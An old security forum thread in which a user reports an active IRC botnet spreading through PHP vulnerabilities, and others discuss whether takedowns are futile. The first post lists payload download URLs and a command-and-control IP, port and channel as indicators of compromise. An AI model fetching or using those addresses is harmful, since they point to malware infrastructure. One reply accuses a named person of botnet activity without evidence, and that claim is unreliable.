Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How robots and spiders are causing issues, how to stop them. We can also talk about Completely Automated Public Turing Test To Tell Computers And Humans Apart - their use, their compliance issues, porn proxies, PWNtcha and other ways to defeat them. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Active Botnet
Posted by: Evaders99
Date: October 25, 2006 11:15PM

(I guess this topic goes under Robots, if not, feel free to move it)

Wonder if I can get some help on an active botnet. While my server and many others are already blocking libwww-perl, it is still a concern for the hundreds, perhaps thousands of servers under control of these guys.

http://crewbox.by.ru/crew/list.txt
is the main file being injected through many known PHP script vulnerabilities

that loads an IRC bot
http://crewbox.by.ru/crew/x2.txt

which goes to
208.53.153.25:13131
room #box

I just idled for an hour logging everything, until they finally kicked me off.
Already emailed the webhost as well as the IRC host, but I don't know if they will do anything. Any way you can think of to either bring them down / stall them / or disclose to the many servers that have been hacked this way?

Options: ReplyQuote
Re: Active Botnet
Posted by: maluc
Date: October 25, 2006 11:41PM

honestly, not to be pessimistic.. but botnet herders are wayyy ahead of the anti-botnet crowd. Shutting down their IRC server really isn't going to solve anything - just annoy them. Assuming theyre smart enough to keep connection logs .. they already know every IP of infected clients. All they have to do is reinfect one with a high upload speed to server as a new server, then reinfect the rest to point to the new server. This too can be automated.. so i'm not really sure what your hoping the outcome to be. But it's probably overly optomistic :/

The best you can really hope for to shut them down is two-fold. either A.) contact every infected bot and get them to fix their vulnerabilities.or B.) If they're using it for monetary gain like AdSense or adware installs, locate their affiliate ID then notify Google/adware distributor that that affiliate is using illegal means. Additionally, Google/company may have personal information of the cracker like name and bank account with which to give to authorities in their country. Looking at the URL though, if the cracker is in Russia as well, you might as well save yourself the effort.

Back to point (A) you 'could' also hack all those IPs yourself, if you can get a list, and patch their holes so that their no longer exploitable. Unfortunately for Good Samaritans, that's illegal despite the good intentions. In conclusion, the anti-botnet groups are hardly putting a dent into the botnet community and mostly just a pesky fly on their wall. Keep your own servers protected and that's probably the best you can hope for. :/

Pessimistic i know, but true
-maluc

Options: ReplyQuote
Re: Active Botnet
Posted by: kimberly411
Date: July 27, 2007 11:45AM

I don't know if this will help, but have you tried anticrawl, it's a small a small program that works with your sql and scans for bad bots. It's supposed to work pretty well. The link is anticrawl.com.

It seems a shame that you have to labor so hard to weed out scrapers and such if in fact that is what's going on. Apparantly this guy Robert Plank is a botnet kind of guy. Good Luck with everything.

Options: ReplyQuote
Re: Active Botnet
Posted by: rsnake
Date: August 26, 2007 05:40PM

Interesting - I hadn't seen that before. I've built a lot of the same tech before, but never seen anything pre-canned before.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.